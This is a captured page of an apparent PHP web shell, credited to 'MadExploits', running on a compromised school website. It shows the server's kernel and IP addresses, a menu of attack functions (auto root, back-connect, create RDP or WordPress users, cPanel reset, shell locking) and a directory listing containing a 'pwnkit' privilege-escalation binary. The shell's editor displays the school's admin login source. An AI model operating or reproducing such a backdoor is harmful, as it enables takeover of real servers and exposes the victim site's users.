Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.15.17.137
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
nbspublicschool /
public_html /
nbs_website /
[ HOME SHELL ]
Name
Size
Permission
Action
_saving
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
font-awesome-4.7.0
[ DIR ]
drwxr-xr-x
image
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
admin-dashboard.php
1.76
KB
-rw-r--r--
changepass.php
5.84
KB
-rw-r--r--
disclosure.php
9.45
KB
-rw-r--r--
enquiry.php
5.22
KB
-rw-r--r--
faculty.php
10.86
KB
-rw-r--r--
gallery.php
10.98
KB
-rw-r--r--
homework.php
12.56
KB
-rw-r--r--
index.php
2.39
KB
-rw-r--r--
logout.php
174
B
-rw-r--r--
news.php
9.74
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
subject_tit.php
9.06
KB
-rw-r--r--
syllabus.php
10.28
KB
-rw-r--r--
tc.php
11.2
KB
-rw-r--r--
topper.php
12.28
KB
-rw-r--r--
video.php
11.66
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php session_start(); require_once('lib/configure.php'); if($obj->checkLogin('admin')){ $obj->redirect("admin-dashboard.php"); } if(isset($_POST['login']) && !empty($_POST['login'])) { $obj->login(); } ?> <!DOCTYPE><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title> NBS Public School| Admin Panel</title> <link rel="stylesheet" href="css/style.css"> <link href="images/logo/favicon.png" rel="shortcut icon" type="image/vnd.microsoft.icon"/> </head> <div class="log"> <img src="../images/logo.png"> </div> <form class='login-form' method="post" action=""> <div class="flex-row"> <label class="lf--label" for="username"> <svg x="0px" y="0px" width="12px" height="13px"> <path fill="#B1B7C4" d="M8.9,7.2C9,6.9,9,6.7,9,6.5v-4C9,1.1,7.9,0,6.5,0h-1C4.1,0,3,1.1,3,2.5v4c0,0.2,0,0.4,0.1,0.7 C1.3,7.8,0,9.5,0,11.5V13h12v-1.5C12,9.5,10.7,7.8,8.9,7.2z M4,2.5C4,1.7,4.7,1,5.5,1h1C7.3,1,8,1.7,8,2.5v4c0,0.2,0,0.4-0.1,0.6 l0.1,0L7.9,7.3C7.6,7.8,7.1,8.2,6.5,8.2h-1c-0.6,0-1.1-0.4-1.4-0.9L4.1,7.1l0.1,0C4,6.9,4,6.7,4,6.5V2.5z M11,12H1v-0.5 c0-1.6,1-2.9,2.4-3.4c0.5,0.7,1.2,1.1,2.1,1.1h1c0.8,0,1.6-0.4,2.1-1.1C10,8.5,11,9.9,11,11.5V12z"/> </svg> </label> <input id="username" class='lf--input' name="username" placeholder='Username' autocomplete="off" onKeyUp="forget_pass()" type='text'> </div> <div class="flex-row"> <label class="lf--label" for="password"> <svg x="0px" y="0px" width="15px" height="5px"> <g> <path fill="#B1B7C4" d="M6,2L6,2c0-1.1-1-2-2.1-2H2.1C1,0,0,0.9,0,2.1v0.8C0,4.1,1,5,2.1,5h1.7C5,5,6,4.1,6,2.9V3h5v1h1V3h1v2h1V3h1 V2H6z M5.1,2.9c0,0.7-0.6,1.2-1.3,1.2H2.1c-0.7,0-1.3-0.6-1.3-1.2V2.1c0-0.7,0.6-1.2,1.3-1.2h1.7c0.7,0,1.3,0.6,1.3,1.2V2.9z"/> </g> </svg> </label> <input id="password" class='lf--input' name="password" autocomplete="off" placeholder='Password' type='password'> <input type="hidden" name="login" value="1" /> </div> <input class='lf--submit' type='submit' name="submit" value='LOGIN'> </form> <script src="js/jquery.1.11.min.js" type="text/javascript"></script> <script type="text/javascript"> function forget_pass(){ var username= $('#username').val(); var type= $('#log_type').val(); if(username != '' && type == '21') { $('#forget').show(); } } </script> </body> </html>
Close